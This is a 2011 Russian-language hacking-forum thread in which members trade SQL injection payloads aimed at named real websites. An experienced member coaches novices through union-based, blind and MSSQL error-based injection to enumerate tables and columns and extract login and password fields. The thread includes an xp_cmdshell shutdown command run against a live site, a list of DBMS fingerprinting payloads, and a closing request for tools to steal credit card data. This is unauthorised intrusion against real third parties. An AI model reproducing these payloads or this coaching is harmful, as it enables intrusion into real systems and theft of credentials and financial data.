RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-11 03:26:34.126666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Smexatronik: http://www.ak-47.us/AK47-FAQ.php?id=137)+order+by+1–+ http://www.simonsig.co.za/newsDisplay.php?TB_iframe=true&height=480&width=760&n_id=77+order+by+1–+
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-14 23:20:16.260000
|
|
|
Bapukada
Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
|
http://www.flowersun.ru/index.php?razdelID=810' че дальше делать? Подбирать пароли… http://www.flowersun.ru/index.php?razdelID=810'+union+select+1,2,3 и т.д. Так?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-20 22:05:51.883333
|
|
|
florgas
Сообщений: 377
Оценки: 0
Присоединился: 2009-10-12 14:44:27.050000
|
В моем случае на сайте/регистрации на sql'е используется такой адрес: http://***.***.***/***/index.php?act=news. Читал эту тему и что-то немножко не догоняю с чего начать?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-23 22:31:40.393333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Bapukada: http://www.flowersun.ru/index.php?filenumber=13229'+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))>1–+&num=&razdelID=785&frompage=1 2florgas: "Немножко не догоняю" в чём вопрос. Если - "с чего начать?", то - со статей по SQL инъекциям.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-05-24 22:45:21.253333
|
|
|
florgas
Сообщений: 377
Оценки: 0
Присоединился: 2009-10-12 14:44:27.050000
|
r1dex, во всех статьях пишется про "id=", а у меня не так… Я уже все по статьям делал и когда я делаю какой-нибудь запрос просто ничего не происходит…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-01 21:31:21.413333
|
|
|
Cmsko666
Сообщений: 3
Оценки: 0
Присоединился: 2011-05-31 22:26:41.870000
|
Народ,что я не так написал в даном запросе,CMS DLE: index.php?do=search&subaction=search&story=hfjvnc&sql_count=union+select+from+dle_users+where+user_group=1+limit+1--&titleonly=FOUR
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-02 01:15:02.106666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Cmsko666: union+select+столбцы+from+dle_users+where+user_group='1'+limit+1– если кавычки не проходят, переводим в hex (без кавычек)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-02 14:33:35.816666
|
|
|
Cmsko666
Сообщений: 3
Оценки: 0
Присоединился: 2011-05-31 22:26:41.870000
|
r1dex тоесть нужно там где ты написал "столбцы" вписать типа 1,2,3,4… ?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-03 00:09:25.950000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2Cmsko666: Ну да, определяешь кол-во столбцов с помощью order by.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-03 08:53:12.316666
|
|
|
Cmsko666
Сообщений: 3
Оценки: 0
Присоединился: 2011-05-31 22:26:41.870000
|
r1dex,количество столбцов я лучше посмотрю в БД,всё таки CMS в свободном доступе.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-03 10:44:27.353333
|
|
|
NullByte
Сообщений: 16
Оценки: 0
Присоединился: 2011-05-05 12:08:06.893333
|
quote:
ORIGINAL: Cmsko666 r1dex,количество столбцов я лучше посмотрю в БД,всё таки CMS в свободном доступе. Бред. Во первых с ордером будет быстрее чем лазить искать конкретную страницу двигла и там искать выводы столбцов, во вторых не факт что они совпадут с тем что на вашем сайте. На счёт столбцов, там нужно вписать не 1,2,3,4, а имена столбцов которые нужны, логина и пароля думаю, остальные столбцы можно заполнить произвольными цифрами, главно чтобы были выбраны все селектом.. Допустим с ордер бай узнали что там их 5, и все видимые, значит будет что-то типа -1+union+selecet+login,pass,3,4,5+from+…. А вообще не мешало бы для начала ознакомится со статьями про инъекции, их куча
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-06 22:26:54.310000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Доброго времени суток! Сразу к делу! Нашёл вот это: http://www.ostashkov.ru/news/show-22306'/ (там много написано, нет смысла сюда копировать, кому интересно можете заглянуть;)) стал вазбираться, попробовал вот это http://www.ostashkov.ru/news/show-22306'+union+select+1,2,3;--/ (ошибка union не подходит кол-во столбцов) Тут естественно я начал радоваться, думал подберу столбцы и в базе поковыряюсь: http://www.ostashkov.ru/news/show-22306'+union+select+1,2;--/ Подобрать-то подобрал, но вот реализация стала для меня проблемой, еденичку-то никуда не выводит, к тому же с ASP.NET сталкиваюсь впервые. Посоветуйте что сделать с этим сайтом! Заранее благодарен, жду ваших предложений!
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-06 23:56:06.793333
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Ковырял-ковырял, сайт перестал отвечать. Хм! Меня спалили или кто-то добрался? Если 2ое расскажите как)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-07 00:10:50.390000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ну уронил сайт. Когда поднимут посмотрю что там.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-07 01:07:11.640000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
А я думал это мои http://www.ostashkov.ru/news/show-22306';exec+master..xp_cmdshell+'shutdown -r'--/ его положили=)) Хрен поймёшь выполняются команды или нет(
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-09 01:28:28.326666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Так это MSSQL. http://www.ostashkov.ru/news/show-22306'+or+1=@@version–+/ Крутим так: http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))–+/
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-10 18:03:07.280000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Спасибо, за помощь. Но всё таки выдаёт следующее: Ошибка преобразования значения nvarchar "RestReport" в тип данных int.
Описание: Необработанное исключение при выполнении текущего веб-запроса. Изучите трассировку стека для получения дополнительных сведений о данной ошибке и о вызвавшем ее фрагменте кода.
Сведения об исключении: System.Data.SqlClient.SqlException: Ошибка преобразования значения nvarchar "RestReport" в тип данных int. П.С.:Я правильно запрос понял? 1=первому значению в инф_схеме.таблицы в колонке имя_таблицы, где имя таблицы НЕ первое значение в инф_схеме.таблицы в колонке имя_таблицы… Странный запрос…)) П.П.С.:Понял что многого не знаю, полез луркать.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-10 18:25:27.436666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ну так "RestReport" и есть имя таблички… Смотрим следующую.. http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))–+/ Видим - "cmsImageExclude" И т.д. ЗЫ: Смотри FAQ по MSSQL инъекциям.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-10 18:43:15.246666
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Ёмаё! Теперь понятно) П.С.:Уже читаю)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-11 01:44:56.723333
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
r1dex, без тебя не справиться( просмотрел названия таблиц, хочу посмотреть назавания колонок для заинтересовавших таблиц, НО: -подставленные в конец твоего запроса WHERE TABLE_NAME='xxx' выдают не то или пролистываться не хотят; -LIKE '%pass%' (или другие маски с %) - Bad Request (Invalid URL), прочие маски тоже не дают результата(как с WHERE) -пытался впихнуть CONCAT(), меня лаского послали, сказали: "тут такие не живут, не прописаны и мы о них не слышали вообще!" -немогу понять как реализовать BETWEEN вместе с ROW_NUMBER(), что по некоторым данным заменит limit… Есть что посоветовать?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-11 20:36:20.396666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Узнаем 1-ую колонку: http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RestReport')–+/ Узнаем 2-ую колонку: http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RestReport'+AND+COLUMN_NAME+NOT+IN+('id'))–+/ Узнаем 3-юю: http://www.ostashkov.ru/news/show-22306'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='RestReport'+AND+COLUMN_NAME+NOT+IN+('id','author'))–+/ И т.д.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-13 01:49:31.890000
|
|
|
Tuy
Сообщений: 7
Оценки: 0
Присоединился: 2011-06-06 22:03:04.643333
|
Спасибо, r1dex! Вопросов ещё много, но, думаю, дальше разберусь сам. Углубился в изучение МSSQL, затянуло=))
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-25 12:16:57.150000
|
|
|
kiddi
Сообщений: 1
Оценки: 0
Присоединился: 2011-06-25 11:51:29.686666
|
Всем привет! можете помочь, у меня например есть сайт site.ru/id=36 , в куки есть парметр sid=3 и при изменениии его на такой sid=-3 выходит ошибка Warning: get_value_by_attribute(): Node no longer exists (File: functions.php, Line: 227) Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given (File: class.DataBase.php, Line: 152) это просто ошибка? тоесть с ней можно чтонить сделать?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-06-29 23:15:07.836666
|
|
|
krasdix
Сообщений: 14
Оценки: 0
Присоединился: 2009-05-06 07:53:19.170000
|
Народ подскажите пожалуйста, вот есть в номере 6 2011 года "Хакер", там статья про SQL инъекцию в JOOMLA com_virtuemart… да я нашел сайт, и определил путем задержки как там было написано версию MYsql, там была дана ссылка на эксплойт, я скачал, посмотрел код, написан на pythone, а что дальше делать, просто не знаю, подскажите плиз.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-01 14:20:50.410000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
Всем доброе время суток. Возникла вот такая проблемка… http://forums.d2evil.org/index.php?act=clans&a=-9+union+select+1,2,3,4,5,6+--+ Там вроде как слепая, пробую через Havijб прога вычисляет 6 полей потом пишет что уязвимости нет… (она там есть) Кто сможет… по советуйте что можно сделать в данной ситуации… За ранее спасибо.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-02 08:09:38.336666
|
|
|
OJIEHb
Сообщений: 151
Оценки: 0
Присоединился: 2010-12-01 19:04:30.843333
|
ver(): 5.1.49-3-log user(): z1****7_m*@*7.2*1.1*0.*4 data(): z1****7_m* Получил вот такие данные. Сначала UNION+SELECT сделал, а потом загнал на один сайт. Он раскрутил ее и выдал мне такие данные. Что мне с ними делать? PS: * я поставил сам, дабы скрыть от вас возможно нужную информацию.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-04 01:48:58.560000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2kiddi: В сети масса статей в которых написано как определить наличие уязвимости. 2krasdix Банально, но…. запустить эксплоит (я знаю, я кэп) 2sepo И почему ты думаешь, что там есть уязвимость? 2OJIEHb 5-ая ветка, в чем проблема? Крути дальше…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-11 10:46:38.183333
|
|
|
verynice
Сообщений: 2
Оценки: 0
Присоединился: 2011-07-11 10:09:24.600000
|
А как вытащить бд? если есть название и логин бд
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-12 17:43:44.146666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
2verynice: Если через SQL-inj, то просто раскручиваешь дальше… 213.Alexandro По первой ссылке ошибки, по остальным 404. И что?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-13 23:27:55.950000
|
|
|
Once_pams
Сообщений: 3
Оценки: 0
Присоединился: 2011-07-13 23:16:31.770000
|
Народ подскажите что с этим сделать, я вобщем то новичок..) достаточно будет даже ответа типа "да можно" =) и хотя б куда копать и каким методом, перебор может или ещё как, дальше сам попробую =) http://www.kontrolnaja.ru/dir/114642'
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-28 12:41:27.220000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: Once_pams Народ подскажите что с этим сделать, я вобщем то новичок..) достаточно будет даже ответа типа "да можно" =) и хотя б куда копать и каким методом, перебор может или ещё как, дальше сам попробую =) http://www.kontrolnaja.ru/dir/114642' вроде нет иньекции
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-07-28 14:01:54.016666
|
|
|
wekly
Сообщений: 505
Оценки: 0
Присоединился: 2011-07-08 14:35:05.483333
|
quote:
Народ подскажите что с этим сделать, я вобщем то новичок..) достаточно будет даже ответа типа "да можно" =) и хотя б куда копать и каким методом, перебор может или ещё как, дальше сам попробую =) http://www.kontrolnaja.ru/dir/114642' quote:
вроде нет иньекции Инъекции 100% нет.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-08-12 02:02:28.453333
|
|
|
xakir2
Сообщений: 55
Оценки: 0
Присоединился: 2010-05-28 13:57:22.590000
|
там их и не было
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-08-30 19:48:55.156666
|
|
|
worsvch
Сообщений: 23
Оценки: 0
Присоединился: 2009-02-27 21:40:43.653333
|
Подскажите как узнать какая СУБД и какой версии используется на сайте?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-09-01 00:01:26.010000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
1. Запросами. К примеру: MySQL id=1+procedure+analyse() id=1+and+concat_ws(1)=1 id=1+and+connection_id()=connection_id() MSSQL id=1+and+len(@@version)=len(@@version) id=1+and+(@@TEXTSIZE>@@LANGID) PostgerSQL id=1+and+1=1::int id=1+and+pg_backend_pid()=pg_backend_pid() id=1+and+5432=inet_server_port() Access id=1+and+1=StrConv(1,1) id=1+and+Sgn(1)=Sgn(1) Oracle id=1+and+to_char(22)=to_char(2)||to_char(2) id=1+and+instr4(1,1,1,1)=1 id=1+and+rownum=rownum Sybase id=1+and+inttohex(10)=inttohex(10) 2. По ошибкам: PostgreSQL: pg_exec() pg_numrows() pg_query() pg_fetch_array() и т.д. Access: [Microsoft][ODBC Microsoft Access Driver] или Microsoft JET Database Engine error MS SQL: [Microsoft][ODBC SQL Server Driver] InterBase\Firebird: ibase_query() ibase_fetch_object() ibase_free_result() ibase_fetch_row() Oracle: ORA-01756 (И вообще всякие ORA) Sybase: Sybase error sybase_query() sybase_num_rows() (с) Jokester Ну а версию уже при раскрутке..
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-09-14 03:35:46.883333
|
|
|
Hisoko160
Сообщений: 1
Оценки: 0
Присоединился: 2011-09-14 03:25:28.993333
|
www. lcsg.fr/?page=%1&what=news
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-09-14 05:43:48.610000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Просто раскрытие путей.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2011-11-08 12:38:59.503333
|
|
|
thom crowz
Сообщений: 37
Оценки: 0
Присоединился: 2011-03-01 14:49:21.793333
|
where is best program to get database information , by sql for example credit card information? and where is the resource?
|
|
|
|
|